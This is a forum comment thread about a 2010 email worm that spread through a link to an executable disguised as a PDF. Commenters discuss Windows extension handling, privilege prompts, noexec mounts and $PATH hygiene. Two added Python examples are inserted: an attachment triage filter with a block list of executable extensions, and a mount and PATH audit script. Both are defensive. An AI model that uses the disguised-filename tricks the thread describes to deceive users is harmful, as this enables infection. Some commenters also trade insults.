      Going back to the original point of this entire topic, why would an application need admin privs in order to send copies of itself to every email address it can find? Bearing in mind that if "requires admin privs" is the only thing you can think of to prevent malware from executing, you're going to be in serious trouble sooner or later.

    92. Re:So that's why the UW mail system went down by Ihmhi · · Score: 1

      I've done computer repair freelance (as well as the requisite "family and friends try to mooch for free" package) for many years. In my experience the "average user" treats a computer like an appliance. The iPad and similar devices basically seem to be just that, and people are happy with it.

      I have the feeling that the next step Apple will take is a "simple Mac" that runs on the same sort of OS as the iPad and iPod - a little more flexible and powerful but essentially as idiot-proof as possible.

    93. Re:So that's why the UW mail system went down by Dr_Barnowl · · Score: 3, Informative

      Yes, it is. But you have to download it, save it, set the executable bit, and then run it.

      The core problems in Windows that enable this:

      • The shell decides which file types are executables based on the file name extension
      • The shell, by default, is configured to hide the file name extension from the user
      • The shell trusts executable files to be able to choose their own icon
      • There is no executable bit in the filesystem

      This means files like MyHappyDocumentAndNotAnEvilWorm_pdf.scr can pass themselves off as a PDF file by having a PDF icon, but will be executed as soon as a user double clicks them (because they have the obscure but "executable" extension for screen savers, which are just normal executables).

      On Unix...

      • The shell makes its own mind up about what a file is, it doesn't trust the extension
      • The shell presents a single icon for binary executables, and a single icon for scripts
      • The user has to explicitly set the executable bit on anything they download

      All of which means that they are not so easy to take in with this particular variant of user-exploit.

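An added example (not code from this thread, from Microsoft or from any mail product) covering both the gateway block list from comment 90 and the disguised-extension problem in comment 93: it classifies attachment names the way a mail gateway might, using the last extension only (as the Windows shell does), and shows what the recipient sees when extensions are hidden. The extension sets are illustrative subsets chosen for this example, not a vendor's published list.

```python
"""Attachment-name triage for a mail gateway (added example).

EXECUTABLE_EXTS and DOCUMENT_EXTS are illustrative subsets chosen for this
example, not Microsoft's published list of dangerous file types.
"""
import os
import re
from typing import Dict, List, Optional, Tuple

# File types the Windows shell runs directly on double click (illustrative subset).
EXECUTABLE_EXTS = {
    "exe", "scr", "com", "pif", "bat", "cmd", "vbs", "vbe", "js", "jse",
    "wsf", "wsh", "hta", "cpl", "msi", "lnk",
}
# Tokens a recipient reads as "just a document" (illustrative subset).
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt",
                 "jpg", "jpeg", "png", "gif"}


def real_extension(filename: str) -> str:
    """The extension the shell dispatches on: the last one, case-insensitive."""
    return os.path.splitext(filename)[1].lstrip(".").lower()


def displayed_name(filename: str) -> str:
    """What Explorer shows when 'hide extensions for known file types' is on."""
    stem, ext = os.path.splitext(filename)
    return stem if ext else filename


def decoy_token(filename: str) -> Optional[str]:
    """A document-like token in the stem, e.g. 'pdf' in 'report_pdf.scr'."""
    stem = os.path.splitext(filename)[0].lower()
    found = None
    for token in re.split(r"[._\-\s]+", stem):
        if token in DOCUMENT_EXTS:
            found = token
    return found


def triage(filename: str) -> Dict[str, object]:
    """Decide allow/block for one attachment name and explain why."""
    ext = real_extension(filename)
    executable = ext in EXECUTABLE_EXTS
    decoy = decoy_token(filename) if executable else None
    reasons: List[str] = []
    if executable:
        reasons.append(f"runs on double click (.{ext})")
        if decoy:
            reasons.append(f"document-like token '{decoy}' before the real extension")
        if displayed_name(filename) != filename:
            reasons.append(f"shown as '{displayed_name(filename)}' with extensions hidden")
    return {
        "filename": filename,
        "displayed_as": displayed_name(filename),
        "executable": executable,
        "decoy_document": decoy,
        "action": "block" if executable else "allow",
        "reasons": reasons,
    }


def filter_attachments(names: List[str]) -> Tuple[List[str], List[str]]:
    """Gateway policy from comment 90: drop every attachment that would execute."""
    allowed: List[str] = []
    blocked: List[str] = []
    for name in names:
        (blocked if triage(name)["executable"] else allowed).append(name)
    return allowed, blocked


if __name__ == "__main__":
    # Constructed sample names; the first is the one quoted in comment 93.
    for name in ["MyHappyDocumentAndNotAnEvilWorm_pdf.scr", "report.pdf.exe",
                 "quarterly.pdf", "setup.EXE", "notes"]:
        print(triage(name))
```
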
    94. Re:So that's why the UW mail system went down by tendays · · Score: 2, Informative

      That's the approach Unix has used for a long, long time now. Installed programs on a Unix system are generally root-owned and sit in directories that are also root-owned. For a normal user, both the executable and the directory in which it is located are read-only.

      System-wide programs are stored in directories not writable by normal users, but that doesn't prevent a user from downloading a trojan into his own directory and running it, which is what the parent was talking about.

      Unix systems do offer the option to mount /home (and other mount points like /tmp where the user has write access) with -o noexec which would close that issue, but I've never seen a linux distribution that would do that by default, because users expect to be able to run programs they've downloaded without having to jump through hoops.

    95. Re:So that's why the UW mail system went down by c0mpliant · · Score: 1

      Post hoc ergo propter hoc

      --
      There is no -1 disagree
    96. Re:So that's why the UW mail system went down by TheRaven64 · · Score: 1

      On a well-designed system, an app would only be able to access system libraries that had the correct capability flags, files in a private per-app directory, and files that the user explicitly allowed it to access. You'd run it and it would then require the user to grant it access to the address book, and the user to grant it the email-sending capability or the network-access capability. This, by the way, is almost exactly the security model employed by the Symbian EXA2 kernel.

      Giving users a binary choice to either not run the program, or run it with all of the privileges that they have, is a terrible design decision. Programs should start with a small set of privileges - enough to do most things, but not to compromise the system - and need to explicitly request others.

      --
      I am TheRaven on Soylent News
    97. Re:So that's why the UW mail system went down by c6gunner · · Score: 1

      I understood what you were saying, which is why I think you're retarded. There is no manufacturer anywhere in the world that is expected to "make an effort to restrict their audience to the technically skilled". Your blind hatred of MS and your petulant demands are completely irrelevant, since you've demonstrated absolutely no reason why such an exception should be made.

      I'm sorry that you found my previous comment offensive - I was merely trying to be helpful. Perhaps the product I linked to required too much "technical proficiency" for your taste - let me try again.

    98. Re:So that's why the UW mail system went down by Anonymous Coward · · Score: 0

      Personally I have only three:
      - no threaded view in Outlook (actually there is supposed to be one, but I have never found how to switch to it.)
      - taking a mail in the "sent items" and pressing reply writes a mail to yourself. Taking it literally that is correct, but it's still idiotic: I obviously want to amend my previous mail. Few people want to talk to themselves via email.
      - pissing contest between Office and OS developers at Microsoft (if you e.g. want to disable ClearType you have to do it twice: once in the system settings and once in Outlook).

    99. Re:So that's why the UW mail system went down by node_chomsky · · Score: 1

      I believe you, I am just saying that the presence of a phone and SMS makes them more different than you are implying. Not to mention, price and contractual commitments are involved with phones. The iPod is still more of a 'smart' MP3 player than a 'dumbed-down' cellular phone.

    100. Re:So that's why the UW mail system went down by SL+Baur · · Score: 1

      How easy would it be to prepend ~/bin to $PATH and stick it in there?

      Irrelevant. /home should be mounted noexec unless you're a software developer and even then it's probably better to set up a special area that you don't normally touch to do program development.

      But, you could set the system login scripts to forbid ~/bin, ., etc. being in the $PATH. And you can set $PATH to READONLY before allowing user .profile/.bash_profile/.zlogin etc. to execute. This can be defeated, but not without command line magic and it won't have any effect on the window manager.

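An added audit script (not from this thread or any distribution) for the two controls discussed in comments 94 and 100: whether the filesystems a normal user can write to are effectively mounted noexec, and whether $PATH contains entries (~/bin, ".", an empty component) that let code in a user-writable directory shadow system binaries. The mount table and PATH value are constructed sample input; on a real host you would read /proc/mounts and os.environ["PATH"] instead.

```python
"""Audit noexec coverage of user-writable mount points and $PATH hygiene.

Added example. The mount table and PATH below are constructed samples.
"""
from typing import Dict, List, Optional, Set

# Mount points a normal user can write to (assumption for this example).
USER_WRITABLE = ("/home", "/tmp", "/var/tmp", "/dev/shm")

# Constructed /proc/mounts excerpt: /tmp is noexec, /home and /dev/shm are not,
# and /var/tmp has no mount of its own, so it inherits the options of /.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
/dev/sda2 /home ext4 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
"""

# Constructed PATH: ~/bin prepended, "." and a trailing empty component.
SAMPLE_PATH = "/home/alice/bin:/usr/local/bin:/usr/bin:/bin:.:"


def parse_mounts(text: str) -> Dict[str, Set[str]]:
    """Map mount point -> set of mount options, in /proc/mounts format."""
    mounts: Dict[str, Set[str]] = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        # /proc/mounts escapes spaces in paths as \040.
        mountpoint = fields[1].replace("\\040", " ")
        mounts[mountpoint] = set(fields[3].split(","))
    return mounts


def covering_mount(mounts: Dict[str, Set[str]], path: str) -> Optional[str]:
    """Longest mount point that is a prefix of path (on a component boundary)."""
    best: Optional[str] = None
    for mp in mounts:
        if path == mp or path.startswith(mp.rstrip("/") + "/"):
            if best is None or len(mp) > len(best):
                best = mp
    return best


def mounts_missing_noexec(text: str) -> Dict[str, str]:
    """User-writable paths whose effective mount lacks noexec -> covering mount."""
    mounts = parse_mounts(text)
    missing: Dict[str, str] = {}
    for path in USER_WRITABLE:
        mp = covering_mount(mounts, path)
        if mp is not None and "noexec" not in mounts[mp]:
            missing[path] = mp
    return missing


def risky_path_entries(path_value: str, home: str) -> List[str]:
    """PATH components where a user-writable file could shadow a system binary.

    Flags '.', empty components (also the current directory), anything under
    the user's home, and relative entries. Comment 100 suggests marking PATH
    read-only in the system login scripts once it has been cleaned up.
    """
    home_prefix = home.rstrip("/") + "/"
    flagged: List[str] = []
    for entry in path_value.split(":"):
        if entry in ("", "."):
            flagged.append(entry)
        elif entry == home or entry.startswith(home_prefix):
            flagged.append(entry)
        elif not entry.startswith("/"):
            flagged.append(entry)
    return flagged


if __name__ == "__main__":
    print("no noexec:", mounts_missing_noexec(SAMPLE_MOUNTS))
    print("risky PATH entries:", risky_path_entries(SAMPLE_PATH, "/home/alice"))
```
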
    101. Re:So that's why the UW mail system went down by StuartHankins · · Score: 1

      Distributions act as gatekeepers for the repositories. In the case of Fedora / RHEL, Red Hat is the gatekeeper. They not only compile their own packages (with their own tweaks) of software, but in the case of RHEL, they actively support those packages as well. It's similar with other distros.

      In the end, it all comes down to reputation. We purchase RHEL for peace of mind, and for the servers that aren't critical we use Fedora. That gives me the opportunity to see what's coming up and stay current (Fedora is testing grounds for RHEL) as opposed to us running a no-charge no-support RHEL clone such as CentOS.

    102. Re:So that's why the UW mail system went down by TommyTumult · · Score: 1

      The college freshmen of today never experienced the "2001 all over again", so they are ripe for the pickings of email bombs that look "old hat" to old farts like us.

      I believe they call it Eternal September

    103. Re:So that's why the UW mail system went down by bl8n8r · · Score: 1

      > The actual reason is that the users still haven't learned from the last 9 years of experience.

      That's a nice and easy explanation, but it's false. When all you get from the email is a subject line that says "OMG! Reply now, lp0 on fire!" what do you expect a user to do? They have little choice but to open it in order to assess the issue correctly. It could be important, it could be a scam. You can no longer tell by the subject line.

      The fail is on Microsoft. 9 years -- 9 friggin years (probably a lot longer), and this is still a problem. Why?? What's the problem with fixing the stupid application so the user can't shoot themselves in the foot just by opening an email? If the entire windows subsystem must rely on such a mechanism in order to function then it's a mega-massive-epic fail and Microsoft ought to be held accountable for it.

      This is no different than a car manufacturer mounting a spear on the front of the car and then blaming drivers for stabbing pedestrians. Yes, they need to watch where they're going, but the DESIGN IS FRIGGIN FLAWED. fix it or nix it already.

      --
      boycott slashdot February 10th - 17th check out: altSlashdot.org
    104. Re:So that's why the UW mail system went down by Anonymous Coward · · Score: 0

      I love how businesses think they need to use email.

    105. Re:So that's why the UW mail system went down by camperdave · · Score: 1

      Programs should start with a small set of privileges - enough to do most things, but not to compromise the system - and need to explicitly request others.

      The problem with this approach (good as it is) is that a constant stream of privilege elevation requests conditions the user into granting access by habit. That was one of the main complaints about Windows Vista.

      --
      When our name is on the back of your car, we're behind you all the way!
    106. Re:So that's why the UW mail system went down by binarylarry · · Score: 1

      Oh right, that's why Android has basically taken over the market.

      Because no one wants their devices to be open but us geeks on slashdot.

      Thank you for your informative reply.

      --
      Mod me down, my New Earth Global Warmingist friends!
    107. Re:So that's why the UW mail system went down by RaymondKurzweil · · Score: 1

      If the lock manufacturer kept advertising "more secure than ever!" you might have a case. If Ford advertised "more maintenance-free than ever!"

      God you must be quite sheltered, as I have seen such claims numerous times from such companies.

      They still market how many miles the car can go before scheduled maintenance. And lock manufacturers that add another pin use that wording almost verbatim. Besides, "more secure than ever" is a relative measure, and arguably true even if the security is still poor.

      Do you eat paint chips?

    108. Re:So that's why the UW mail system went down by surgen · · Score: 1

      1. If, as a mail admin, you are still allowing Windows executables of any description through your system, you should be shot.

      We might as well just allow the damn things through.

      I needed to get an executable to someone in the next building. The email server stripped it out. So I threw it on some file sharing site and sent them a link. User clicks the link, gets the download. I've already trained users to click the link in email to the dropbox link in the email and grab the exe. Users are going to run untrusted code regardless of if it is attached or is at the end of a link.

      There isn't any significant hurdle that can be put up that doesn't also block legit uses, it just creates another "only do this if you know you should" that gets worn out and ignored. I have to go to IT every time mp3s emailed to a radio station get quarantined. It is no shock to me that users ignore all the safety nonsense, it's a technical solution that not only tries to solve a non-technical problem, it doesn't even bother to solve the problem.

    109. Re:So that's why the UW mail system went down by RaymondKurzweil · · Score: 1

      Now, if you have what it takes, then either demonstrate with solid reasoning why my logic is faulty or admit that you cannot.

      Your logical deduction may not be faulty, so I'll at least admit that I can't find fault with it and concede.

      But I'll go on to say that a number of your premises are dubious or detached from reality and you are a dilettante and without clue about economic realities and the complexity of the real world outside your inane logic puzzles, and even if you are allowed to use Windows, I don't hold Microsoft responsible. Sorry.

    110. Re:So that's why the UW mail system went down by cusco · · Score: 1

      For ten years I nagged my mother to back up their business files. I created one-click procedures, batch files, anything. Backup to tape, CD, FTP site, and even just the grandkids' game PC. Ten years, and the only backups ever done were when I happened to be visiting. Last year her hard drive went belly-up and she lost everything. Does she back up now? No. (At least now my sister stops by occasionally, zips all new files and emails them to Mom's Gmail account.)

      --
      "Think about how stupid the average person is. Now, realise that half of them are dumber than that." - George Carlin
    111. Re:So that's why the UW mail system went down by Rockoon · · Score: 1

      Ah but that's a direct refusal to utilize the software repos as a trusted source. Just because a user refuses to get their software from a trusted source does not constitute a flaw in the trusted source.

      The original argument was that this worm represented an actual security flaw in Windows, rather than a willingness to run untrusted code.

      Windows users run untrusted code because most of them don't have critical files, or in the case of work machines, they aren't their critical files. Calling their nephew to clean up the infected machine is all the effort they need to put in to fix the problem.

      Additionally, a single central repository won't work for Windows. The amount of demand from all sides would be too high. On the one side the number of package maintainers for a typical Linux repository is relatively small because there aren't a thousand new submissions per day. For Windows, there would literally be way more than 1000 per day. On the other side, Linux repositories don't have the better part of a billion people downloading programs so the bandwidth costs aren't prohibitive.

      The mainly-repository idea just doesn't work for Windows, and there are repositories that don't have package managers for Windows that already exist (TUCOWS, etc.. this is nothing new.) The scale of the Windows market is just too big for these to have a prophylactic effect, and also too big for these repositories to even keep up (most have given up.)

      --
      "His name was James Damore."
    112. Re:So that's why the UW mail system went down by wildstoo · · Score: 1

      The same people who are prepared to open up password protected zipfiles in Windows and execute the contents will be chomping at the bit to chmod +x an email attachment so they can see the dancing bunnies.

      omg.... DANCING BUNNIEZ?!?!?!?!

      SUM1 EMAIL ME THE BUNNIEZ RITE NAO PLZKTHXBAI

      ***clicks the attachment so hard and fast the mouse catches fire***

    113. Re:So that's why the UW mail system went down by wildstoo · · Score: 1

      You just described absolutely everybody I live and/or work with, you insensitive clod.

    114. Re:So that's why the UW mail system went down by TheRaven64 · · Score: 1

      That's not a problem with the approach, that's a problem with the implementation. It was also a problem with the early Java plugin. For example, most applications need to persistently store some data. A lot of apps need to open files created by other apps. Sugar has an elegant solution to this, where the standard file chooser dialog runs as a separate (more privileged) process and passes file descriptors back to the process that invoked it. The user has to select the file, but beyond that isn't aware that they are granting extra privileges to the application.

      The user still gets prompted for things like network access, but it's relatively infrequent. The problem with Vista - like the rest of the NT kernel's security system - was that it made things too fine grained for the typical user to understand.

      --
      I am TheRaven on Soylent News
    115. Re:So that's why the UW mail system went down by pe1chl · · Score: 1

      It is easy to set up Windows like that.
      Just make sure the user is not an administrator, and create a policy to forbid executables in directories that are writable (like %USERPROFILE%).

      Actually it is sad that so few admins actually do this.

    116. Re:So that's why the UW mail system went down by drsmithy · · Score: 1

      That's why I'd like to see Microsoft forced to assume product liability so long as they market their software to the general public on the basis of "ease of use". Either market it to "technically knowledgeable users only" or pay monetary damages to anyone and everyone who suffers in any way due to security issues.

      When you can define "ease of use", "technically knowledgeable" and "security issues" objectively, let us know.

    117. Re:So that's why the UW mail system went down by Anonymous Coward · · Score: 0

      The college freshmen of today never experienced the "2001 all over again", so they are ripe for the pickings of email bombs that look "old hat" to old farts like us.

      I think you just made the case for an argument that I've often seen; that the industry just re-invents itself every decade or so because the older "silverbacks" get dumped or pushed out, and the newer folks don't have a "history" that can be relayed to them. No wonder the industry is such a clusterfuck nowadays.

    118. Re:So that's why the UW mail system went down by Chris+Tucker · · Score: 1

      And how much is an Android phone vs. the iPhone?

      Particularly a subsidized by the carrier Android phone?

      Thanks for playing. Vanna has some lovely parting gifts for you.

      --
      Guaranteed! This comment 100% Anthrax free!
    119. Re:So that's why the UW mail system went down by binarylarry · · Score: 1

      $199 is pretty much the industry standard for smartphones, you dumb fuck.

      --
      Mod me down, my New Earth Global Warmingist friends!
    120. Re:So that's why the UW mail system went down by Chris+Tucker · · Score: 1

      Ah, yes. Gratuitous obscenity and insults.

      Could you be any more the typical Slashdot user?

      I think not.

      --
      Guaranteed! This comment 100% Anthrax free!
    121. Re:So that's why the UW mail system went down by pe1chl · · Score: 1

      The question is if you should be allowed to run an executable that you have downloaded and stored yourself.
      It is easy to setup Windows in such a way that this is not possible, especially in a company environment (Active Directory with Group Policy).
      Then users without special privileges cannot run any software that hasn't been installed by the system administrators. This includes any software found in (links from) mail.

    122. Re:So that's why the UW mail system went down by Anonymous Coward · · Score: 0

      That’s 6 words, or 1 acronym.

    123. Re:So that's why the UW mail system went down by clone53421 · · Score: 1

      MS Outlook is like IE. Slow, bloated, and crappy. Thunderbird is like Firefox.

      --
      Alexander Peter Kristopeit bought his basement from his mommy for one dollar.
    124. Re:So that's why the UW mail system went down by gnasher719 · · Score: 1

      But as you point out seat belts only work if people use them, and if you remember, there was a lot of resistance to the idea despite the evidence that seat belts save lives. My grandmother refuses to wear one to this day because it's "uncomfortable."

      My grandchildren were told that my car cannot drive unless everyone is using their seatbelts. Eventually they figured out it was actually _me_ who doesn't drive :-) Didn't change the fact that the car wouldn't move without them wearing seatbelts. Maybe you should use that approach with your grandmother.

      The other argument is of course that I most definitely won't have anyone sitting _behind me_ without seatbelt. I don't want to die because someone else doesn't want to wear a seatbelt.

  3. Appropriate Prince song plays in the background by TheRealMindChild · · Score: 4, Funny

    "Tonight We're Gonna Party Like It's 1999"

    --

    "When life gives you lemons, don't make lemonade. Make life take the lemons back!" -- Cave Johnson
    1. Re:Appropriate Prince song plays in the background by DiEx-15 · · Score: 1

      Sorry, Prince said the internet was dead.

    2. Re:Appropriate Prince song plays in the background by KingAlanI · · Score: 1

      Was that a coincidental selection? Whether it is or not, LOL.
      Reminded of when MC Lars' "Roommate From Hell" shuffled in on university freshman move-in day.

      --
      I listen to both RIAA and non-RIAA stuff if I like the music, tangential business/politics notwithstanding.
  4. Got mimedefang? by Shoeler · · Score: 3, Interesting

    People still allow .exe files through filters? Helllloooooo mimedefang...

    1. Re:Got mimedefang? by Technoodle · · Score: 2, Interesting

      I had a client that got a link to a .scr file. They thought it was suspicious but clicked it and ran it anyway. When will users ever learn?

    2. Re:Got mimedefang? by gmuslera · · Score: 4, Informative

      The actual file doesn't go in the mail, just the link to download it. mimedefang or antivirus at the mail server doesn't have anything to do with it.

    3. Re:Got mimedefang? by __aaqvdr516 · · Score: 4, Interesting

      I was called to a co-worker's office today. He told me that he received an email from someone in our company. He didn't remember the name of someone he had spoken with yesterday and assumed it was the person that he had talked to. He clicked the link and then witnessed the awesomeness that is this exact worm. I got to see the email. It had all the usual signs of being junk/scam/phishing/younameit. I then further continued to giggle as the company posted a warning on our main site page, having already shut down the mail server. By the time he had caught the worm in action it had operated for about 30 seconds and managed to get around 800 messages (and counting) in his outbox before he killed the process.

    4. Re:Got mimedefang? by Ryukotsusei · · Score: 1

      It's not even that. The one we have at work was basically, here is the file you requested, with a link to some file-sharing website link to a pdf file. Except if you looked at the address it wasn't even the right site. I got about 10 emails today with the "here you have" subject line, as well as 2 emails from people screaming not to open any suspicious emails. Yet I keep getting them...

    5. Re:Got mimedefang? by Anonymous Coward · · Score: 0

      It's even more malicious than you think. It immediately adds copies of itself to every external drive it can find, along with autorun files to re-launch the infection.

    6. Re:Got mimedefang? by Zebai · · Score: 1

      This message was propagating itself at my work, going through the corporate email list for the entire country one by one. I was still getting this message every 2 minutes before I left work today. The link itself was to a pdf, which is something we use quite often at work; only the method of attaching it seemed unusual. Personally, the first one I received looked almost legit; I thought it was some contractor using some odd way to attach a scanned document. Probably why it hooked itself onto so many people. My company's local firewall blocked the site to me, but apparently such security is not nationwide.

      Such things at my employer usually don't stay quiet; will probably hear about some security review along with some expensive public statements saying they are trying to see if this bug somehow obtained some customer data other than our corporate email list.

    7. Re:Got mimedefang? by jimicus · · Score: 1

      Dear oh dear.

      May I introduce you to MailScanner? It will also scan links and remove any that look like they link to something dodgy.

      (And I don't have anything to gain from this - I'm just a very happy user).

    8. Re:Got mimedefang? by Anonymous Coward · · Score: 0

      800? That's it? I got a couple hundred of those emails from co-workers and my name starts with an "A" in the Outlook directory and I'm about 1500 down in the list. I think we managed to give priority routing to the worm, because mail I actually wanted took about an hour to arrive.

  5. The hell? by goodmanj · · Score: 3, Insightful

    Stupid question from a Linux / Mac user:

    Are there really operating systems in use in 2010 that let you write files to a system directory without entering an administrator password?

    1. Re:The hell? by al0ha · · Score: 1, Informative

      Yes and actually Macs are one of them Mr. Snarky.

      In the original account set up on your Mac perform the following

      cd /
      touch testfile
      ls -l testfile

      Whe-e-e-e-e-e-e!!!!!

      --
      Did you ever wake up in the morning, with a Zombie Woof behind your eyes? -- FZ
    2. Re:The hell? by phantomcircuit · · Score: 1

      No but there are plenty of users who automatically click "Allow"

    3. Re:The hell? by Anonymous Coward · · Score: 1, Informative

      Are there really people crazy enough to use operating systems released in 2001 in 2010? The answer is the same.

    4. Re:The hell? by drcheap · · Score: 5, Insightful

      Stupid question from a Linux / Mac user:

      Are there really operating systems in use in 2010 that let you write files to a system directory without entering an administrator password?

      Yes, because people will give a computer anything it asks for, especially if it asks in an ambiguous manner.

      What's this? A UAC prompt asking for permission to "perform the action I requested"? Wait, what was I just doing? Oh yeah, reading email. Yes I want to do that. ]click[

      Same thing would happen if you gave them a Linux/OSX box that asked for admin password. Granted M$ made it easier by not requiring one to actually type in any actual password to elevate privileges.

    5. Re:The hell? by Abcd1234 · · Score: 2, Interesting

      Okay, now try replacing, say /bin/sh, and tell me how that works out.

    6. Re:The hell? by grasshoppa · · Score: 1

      Vista/7, by default prompt.

      Thanks to UAC in vista, folks have been well trained to just click "Yes" when prompted. So yes, this will be a threat.

      --
      Mod me down with all of your hatred and your journey towards the dark side will be complete!
    7. Re:The hell? by goodmanj · · Score: 1

      Point taken, but unless I'm mistaken you can't do any shenanigans by creating new files in /.

      If you could *edit* existing files in / or create files in a path directory, you'd be in business, but you can't: they're all owned by root.

    8. Re:The hell? by Anonymous Coward · · Score: 0

      Unless, like a good security-concerned netizen, you follow directions and reserve that original account for actual Administrative purposes, creating normal, non-privileged user accounts for all your users to surf, check email, and download worms with.

      This works very well, especially when accounts for significant others and children are concerned.

    9. Re:The hell? by archmcd · · Score: 2, Interesting

      Well, in the case of Windows XP and common corporate practices, it's not unusual for an individual that would require administrative rights to log in with an account in the Administrators group on a regular basis, whether administrative tasks will be performed or not. I've worked for companies where 1 in 3 users have administrative rights on their workstation due to a "business need" which may have been a one-time task, but the escalated privileges remain indefinitely. 1 in 3 is an awful lot of people in a company with over 100,000 employees.

      --
      I'm not an expert, but I play one on slashdot.
    10. Re:The hell? by goodmanj · · Score: 4, Insightful

      I know this has been said before, but if your operating system is asking for an admin password often enough that replacing it with a mouseclick significantly improves the user experience, you're solving the wrong problem.

    11. Re:The hell? by tepples · · Score: 2, Informative

      Are there really people crazy enough to use operating systems released in 2001 in 2010?

      Are there really people crazy enough to play video games released in 1980s in 2010? If a 2001 OS is the only thing that will run your application properly, you run the 2001 OS.

    12. Re:The hell? by Skuld-Chan · · Score: 3, Informative

      You can't write files to \windows\system under vista/windows 7 without elevation to administrator. Under XP/2000 as a regular user - ditto.

      That said - there's probably an alarming amount of people who would enter credentials upon getting the elevation prompt on Mac/Windows/Linux after clicking on an attachment or link in their email client.

    13. Re:The hell? by Blakey+Rat · · Score: 1

      They all do, if you configure them to. Using the default configuration? None of them do.

      Note that this virus is mostly affecting people running a 2001 OS (Windows XP), not a 2010 OS (Windows 7). Vista and Windows 7 users are pretty well-protected from this virus, using the default configuration.

      (Of course you weaseled around that one by saying "in use in 2010", but I felt it was only fair to point it out anyway. Hell, Windows 3.11 is "in use in 2010".)

    14. Re:The hell? by 93+Escort+Wagon · · Score: 1

      I still don't get why more Mac users don't do this - running as a non-admin is trivially easy on the Mac. You don't even have to think about it - the OS will prompt you for an admin username/password when necessary (unlike Windows, where you still have to manually select "run as admin" I believe).

      Better security with absolutely no pain. What's the problem?

      --
      #DeleteChrome
    15. Re:The hell? by Anonymous Coward · · Score: 0

      No question is stupid!

      Of course all modern operating systems require administrator privileges to modify such files; however, most viruses circumvent this through some kind of exploit in the operating system or in an admin-privilege-granting application (e.g., sudo). There are many examples of such attacks on all modern platforms (even cell phones!). So do not believe that just because your operating systems only represent a small fraction of the computer systems in production today (and thus are less of a target for attackers) that you are somehow immune to such problems.

    16. Re:The hell? by Missing.Matter · · Score: 1

      And if these users were on Linux they'd happily bang away their password when prompted.

    17. Re:The hell? by Sir_Lewk · · Score: 1

      OS is the only thing that will run your application properly, you run the 2001 OS.

      Not for checking your email it isn't. Unless of course you are a fucking moron.

      --
      "linux is just DOS with a UNIX like syntax" -- Galactic Dominator (944134)
    18. Re:The hell? by Missing.Matter · · Score: 2, Insightful

      The default UAC behavior in Windows 7 is to notify when installing programs and when programs try to change protected Windows settings on their own. The ONLY time I see a UAC prompt is when I install software. How is this unreasonable?

    19. Re:The hell? by Haeleth · · Score: 1

      Yeah, but if you've got any sense, you run it in a sandboxed virtual machine, or as a dual-boot option that you only fire up for that one application, or on a separate heavily-firewalled computer that does not have direct access to the internet and is never used for anything else.

      It remains that using a 2001 OS as your primary desktop environment in 2010 is at best naive, and at worst foolhardy.

      In any case, the number of games that don't work in DosBox OR VirtualBox OR Windows 7 is vanishingly small.

    20. Re:The hell? by Missing.Matter · · Score: 1

      If the user is hell bent on installing anything he wants on his system, no operating system will stop him.

    21. Re:The hell? by TrancePhreak · · Score: 1

      Applications can be built admin-rights aware for windows (where it asks to elevate as necessary). Problem is, not everyone knows how. Fortunately, most installers often have this built into their mechanisms.

      --

      -]Phreak Out[-
    22. Re:The hell? by bertoelcon · · Score: 1

      OS is the only thing that will run your application properly, you run the 2001 OS.

      Not for checking your email it isn't. Unless of course you are a fucking moron.

      Checking email isn't the only thing people do on computers these days.

      --
      Anything can be found funny, from a certain point of view.
    23. Re:The hell? by Sir_Lewk · · Score: 2, Insightful

      If you want to use a decade old operating system to play your little games or whatever, then by all means go for it.

      But don't check your goddamn email with it! Use a separate install with a secure operating system for that. Doing anything else is damned near criminal negligence.

      --
      "linux is just DOS with a UNIX like syntax" -- Galactic Dominator (944134)
    24. Re:The hell? by tepples · · Score: 1

      Yeah, but if you've got any sense, you run it in a sandboxed virtual machine

      For one thing, the upgrade from Windows XP to Windows 7 on a given PC costs money, as does the purchase of a retail Windows XP license if you replace your PC that came with an OEM copy of Windows XP with a new PC that came with an OEM copy of Windows 7. For another, how well do VirtualBox and friends handle DirectX graphics or OpenGL?

    25. Re:The hell? by Anonymous Coward · · Score: 0

      UAC in Vista is not the culprit for the "Yes" response. People were ingrained with this Pavlovian response long before UAC was introduced.

    26. Re:The hell? by ascari · · Score: 1

      Yup, Windows and - ta da! - Mac OSX

    27. Re:The hell? by UnknowingFool · · Score: 1

      The crux of the problem is why didn't people upgrade. Personally I think you can blame MS. If Vista hadn't been a debacle requiring major hardware upgrades for very little gain, many companies would have ditched XP already. Most companies I know are just now upgrading to Windows 7. Of course there are people who don't want to buy new computers that still (more or less) work. Nothing you can do about those people until the computer suffers an irrecoverable crash.

      --
      Well, there's spam egg sausage and spam, that's not got much spam in it.
    28. Re:The hell? by Sir_Lewk · · Score: 1

      For one thing, the upgrade from Windows XP to Windows 7 on a given PC costs money

      Newsflash: keeping things maintained and safe costs money. Or let me guess, you are one of those people who also neglects to keep their car in good safe working order as well?

      how well do VirtualBox and friends handle DirectX graphics or OpenGL?

      Well.

      --
      "linux is just DOS with a UNIX like syntax" -- Galactic Dominator (944134)
    29. Re:The hell? by djlowe · · Score: 1

      Granted M$ made it easier by not requiring one to actually type in any actual password to elevate privileges.

      And, knowing this, the solution is simple: Create a separate, non-privileged account for daily use. When UAC prompts for rights escalation, the user is then forced to enter the username and password of a privileged account.

      Sure, it takes a little longer to set up initially, and is slightly more cumbersome in use, but it works.

      In a Windows Active Directory (AD) environment, I prefer to set things up as follows: Each user computer has a local Administrator-equivalent account for MIS - this account only exists on local computers and has no domain privileges. The primary user's AD account is a standard, non-privileged user on their local computer. In addition, there's a local-only account for the user that has Administrator rights, but has no domain rights - we use the convention of "'username'.local" for this - Joe User's AD account name is juser, his local Administrator-equivalent account is "juser.local". Users needing to install software, etc., escalate privileges via UAC using this account when logged in with their AD account.

      The end result is a complete separation of privileges between local and domain accounts: None of the local Administrator-equivalent users have domain privileges and none of the domain users have local Administrator privileges. [1]

      When a user, logged into their computer with their AD account, needs to install software, they escalate to their .local Administrator account via UAC and install it, and run it once to ensure that any post installation changes (to the Registry, for example) that require rights are done. Then they can exit the software, and run it as "themselves", using their AD account - since it has read-only rights to the software by inheritance, and user data is stored in their local profile directories (to which they already have full rights), nothing else needs to be done.

